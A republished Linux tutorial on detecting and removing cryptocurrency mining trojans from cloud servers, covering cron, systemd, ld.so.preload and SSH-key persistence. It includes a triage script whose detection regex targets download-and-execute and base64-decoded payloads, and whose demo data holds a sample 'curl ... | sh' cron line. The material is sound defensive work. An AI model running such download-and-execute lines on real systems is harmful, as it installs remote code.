Detect and Eliminate Mining Trojans on Cloud Servers: A Complete Guide

This guide explains what mining trojans are, how they consume CPU resources and spread within networks, and provides step‑by‑step detection and removal procedures—including host isolation, network blocking, cron and systemd cleanup, preload hijack removal, and process termination—to help security engineers secure cloud servers.

MaGe Linux Operations

What Is a Mining Trojan

Mining trojans hijack a server's CPU to run the hash computations that cryptocurrency mining requires, starving legitimate workloads of CPU time and, on a pay-per-use cloud instance, running up the bill. Attackers rarely target a specific victim: they scan the Internet indiscriminately and break in through weak SSH credentials and unpatched or misconfigured Internet-facing services.

Typical Attack Characteristics

Some mining trojans exhibit worm-like behavior: after the initial compromise they propagate laterally to other reachable hosts and install several persistence mechanisms (cron jobs, systemd units, /etc/ld.so.preload entries, planted SSH keys) so that the miner survives a reboot or a partial cleanup and keeps earning. Indicators include unusually high CPU usage, processes hidden from ps and top, modified system binaries, and outbound connections to mining pools.

Detection Methods

CPU Monitoring: Use the cloud console or top -c to view real-time CPU consumption. A miner usually pins every core at or near 100%; if total CPU is high but no process accounts for it, assume the process is being hidden (see Common Questions).

top -c

Network Inspection: List the active iptables rules and look for addresses you do not recognise. Mining trojans also add rules of their own, to lock out competing miners or to block the cloud provider's security agent, so unexpected DROP rules are as suspicious as unexpected remote addresses.

iptables -L -n

Cron Jobs: List user and system cron entries to find malicious scheduled tasks. Check every user's crontab, not only root's, and the drop-in locations /etc/cron.d and /etc/cron.{hourly,daily,weekly,monthly}.

crontab -l
crontab -u username -l
cat /etc/crontab

Systemd Services: List unit files and disable any unknown services. For anything unfamiliar, read the unit file to see what it executes; a miner's unit usually lives in /etc/systemd/system and starts a binary in /tmp, /dev/shm or a hidden directory.

systemctl list-unit-files

Preload Hijack: Verify that /etc/ld.so.preload is empty; clear it if it names a library. Any library listed there is injected into every dynamically linked program on the host, which is how ps, top and ls are made to hide the miner. If the file cannot be truncated even as root, the attacker has set the immutable attribute (chattr +i) on it; remove the attribute first.

> /etc/ld.so.preload

SSH Authorized Keys: Inspect ~/.ssh/authorized_keys for unknown public keys and remove them. Check /root/.ssh and every home directory, not only the account you logged in with.
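The checks above can be scripted so that they are repeatable and so that the process-hiding trick is caught. The following is an added example written for this page, not code from the original article or from MaGe; the IOC regular expression, the sample cron lines, the sample PID lists and the library path /usr/local/lib/libhide.so are constructed assumptions, and RUN_LIVE=1 is an assumed switch for running it against a real host as root:

```shell
#!/bin/sh
# Added example, not code from the original article: helpers for the
# detection checklist above. The IOC regex, the sample cron lines and the
# sample PID lists below are constructed for illustration.

# Print cron lines that download-and-execute, decode an embedded payload,
# or run something from a world-writable or hidden directory. Reads stdin.
# The regex is an assumption about typical mining-trojan persistence; tune it.
scan_cron_lines() {
    grep -E -i \
      '(curl|wget)[^|;]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/dev/shm/|/tmp/\.|/var/tmp/\.|/\.[A-Za-z0-9_-]+/' \
      || true      # no match is a normal result, not an error
}

# Print the non-blank lines of an ld.so.preload file. On a stock server this
# prints nothing; any path listed here is loaded into every dynamic binary.
preload_entries() {     # preload_entries FILE
    [ -e "$1" ] || return 0
    grep -v '^[[:space:]]*$' "$1" || true
}

# Given two newline-separated PID lists (what exists under /proc, and what
# ps reports), print the PIDs that ps is not showing.
hidden_pids() {         # hidden_pids PROC_LIST PS_LIST
    for pid in $1; do
        printf '%s\n' "$2" | grep -qx "$pid" || printf '%s\n' "$pid"
    done
}

# Enumerate PIDs with test -d instead of reading the /proc directory:
# LD_PRELOAD rootkits typically hook readdir(), which is how ps, top and ls
# lose the process, while a stat() on /proc/<pid> still succeeds. Slow (it
# walks up to pid_max), which is the price of not trusting libc's listing.
proc_pids_by_stat() {
    max=$(cat /proc/sys/kernel/pid_max)
    n=1
    while [ "$n" -le "$max" ]; do
        [ -d "/proc/$n" ] && printf '%s\n' "$n"
        n=$((n + 1))
    done
}

if [ "${RUN_LIVE:-0}" = "1" ]; then
    echo "== suspicious cron lines =="
    { crontab -l 2>/dev/null
      cat /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/* 2>/dev/null
    } | scan_cron_lines
    echo "== /etc/ld.so.preload =="
    preload_entries /etc/ld.so.preload
    lsattr /etc/ld.so.preload 2>/dev/null      # an 'i' flag means chattr +i was set
    echo "== PIDs present in /proc that ps does not show =="
    hidden_pids "$(proc_pids_by_stat)" "$(ps -e -o pid= | tr -d ' ')"
else
    # Offline demonstration on constructed data (sample IP is from TEST-NET-2).
    printf '%s\n' \
      '0 3 * * * /usr/bin/certbot renew' \
      '*/10 * * * * curl -fsSL http://198.51.100.7/x.sh | sh' \
      '* * * * * /tmp/.X11-unix/.kthreadd' | scan_cron_lines
    hidden_pids "$(printf '1\n2\n4242')" "$(printf '1\n2')"
fi
```

Run it as is to see the constructed sample; run RUN_LIVE=1 sh triage.sh as root on the suspect host. The PID enumeration deliberately avoids readdir() because a preload library that hooks it hides the miner from ps, top and ls alike; a statically linked busybox ps is the other way around that hook.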

Removal Steps

1. Isolate the Host: Use security groups or network ACLs to cut the instance off from the rest of the VPC and from the Internet, leaving only the management path you need (for example SSH from a bastion), so the trojan can neither spread laterally nor fetch a fresh payload while you work.

2. Block Malicious Network Traffic: Drop traffic to and from the mining pool or C2 addresses you identified from the miner's active connections. Insert the rules at the top of the chain (-I) rather than appending them (-A): iptables evaluates rules in order, and an existing rule that accepts established connections would otherwise match first and the DROP would never be reached. This is containment only; the miner keeps burning CPU until the later steps remove it.

iptables -I INPUT -s malicious_ip -j DROP
iptables -I OUTPUT -d malicious_ip -j DROP

3. Delete Scheduled Tasks: Remove the malicious cron entries and disable the related services. Note that crontab -r deletes the entire crontab of the current user, legitimate jobs included; prefer crontab -e (or crontab -u username -e) to remove only the offending lines, and delete the files the trojan dropped into /etc/cron.d. Do this before killing any process, otherwise the job simply re-downloads the miner.

crontab -r

4. Remove Startup Items: On CentOS 6 and earlier (SysV init), run chkconfig --list and turn off unknown services; on CentOS 7 and later, and on any other systemd distribution, use systemctl disable, then delete the unit file and run systemctl daemon-reload so the unit cannot be re-enabled.

chkconfig service_name off
systemctl disable service_name

5. Clean Preload Libraries: Clear /etc/ld.so.preload, then delete the malicious .so files (in that order, otherwise every dynamically linked program prints a loader warning about the missing library until the file is cleared). If truncating the file fails with "Operation not permitted" even as root, the attacker has set the immutable attribute on it (chattr +i); remove the attribute first. Already-running processes keep the hijacked library mapped until they are restarted, so ps and top remain unreliable until you start fresh copies.

> /etc/ld.so.preload
rm -f /path/to/malicious.so

6. Remove Unauthorized SSH Keys: Delete the planted entries from ~/.ssh/authorized_keys, then repeat for /root/.ssh and every other home directory. Match on something unique to the planted key (its comment or a distinctive fragment of the key body) so the sed does not delete legitimate keys as well, and keep a backup of the file before editing it. Also check /etc/ssh/sshd_config for an AuthorizedKeysFile directive pointing somewhere unexpected.

sed -i '/malicious_key/d' ~/.ssh/authorized_keys

7. Kill Mining Processes: Identify the high-CPU processes, record their executable path and parent before terminating them, then kill them. Read /proc/PID/exe before the kill: once the process is gone its /proc entry disappears, and if the binary was deleted from disk (the link shows "(deleted)") the only copy left is the one you can still copy out of /proc/PID/exe. Check the parent process as well; miners are often started by a watchdog that restarts them, so kill the parent first or the whole process group. The bracketed grep pattern keeps the grep itself out of the result.

ps -ef | grep '[m]ining_process'
ls -l /proc/PID/exe
kill -9 PID

8. Delete Malicious Files: Remove the executables behind the killed processes (the paths recorded from /proc/PID/exe), plus any droppers, scripts and hidden directories in /tmp, /var/tmp and /dev/shm that the cron jobs or services pointed at. Copy anything you may need for later analysis before deleting it.

rm -f /path/to/malicious_binary

9. Restore Modified System Binaries: If commands such as top, ps, ls or netstat have been replaced, restore the originals. The command below assumes a pristine copy was kept under the name top.original, which is only true if you or a backup made one; when no trusted copy exists, verify the binary against the package database (for example rpm -V procps-ng) and reinstall the owning package from the distribution repository.

rm -f /usr/bin/top && mv /usr/bin/top.original /usr/bin/top

Risk Assessment and Hardening

Perform a comprehensive risk scan and apply security hardening measures: update the OS and all packages, close the entry point the attacker used (replace weak passwords, move SSH to key-only authentication, patch or firewall the exploited service), configure host and cloud firewalls, and review logs regularly. Treat every credential that was on the host (SSH keys, cloud access keys, database passwords) as exposed and rotate it. Refer to the cloud provider's security documentation for detailed steps.

Common Questions

Why does the trojan reappear after cleaning? Incomplete removal. A leftover cron job, systemd unit or watchdog parent process restarts the miner, a preload library keeps hiding it, and an unchanged weak password or unpatched service lets the attacker walk straight back in. Eliminate every persistence mechanism before killing processes, then close the original entry point.

How do I identify a suspicious process? Verify the executable path via ls -l /proc/$PID/exe (a path under /tmp, /dev/shm or a hidden directory, or a link marked "(deleted)", is a strong signal), compare the file's hash with what the package manager recorded for that path, upload the file to VirusTotal, or dump the process memory for analysis.

What if CPU usage is high but no process is shown? The trojan is hiding it, either by replacing utilities such as top and ps with patched copies, or by listing a library in /etc/ld.so.preload that hooks the directory-reading functions those utilities use. Check for preload entries and for modified binaries, and compare what ps reports against the entries that actually exist under /proc (or run a statically linked copy of ps or busybox, which the preload trick cannot touch). Restoring the original binaries and clearing the preload file resolves the issue.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: Linux, iptables, cloud security, process monitoring, Malware Removal, mining trojan
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
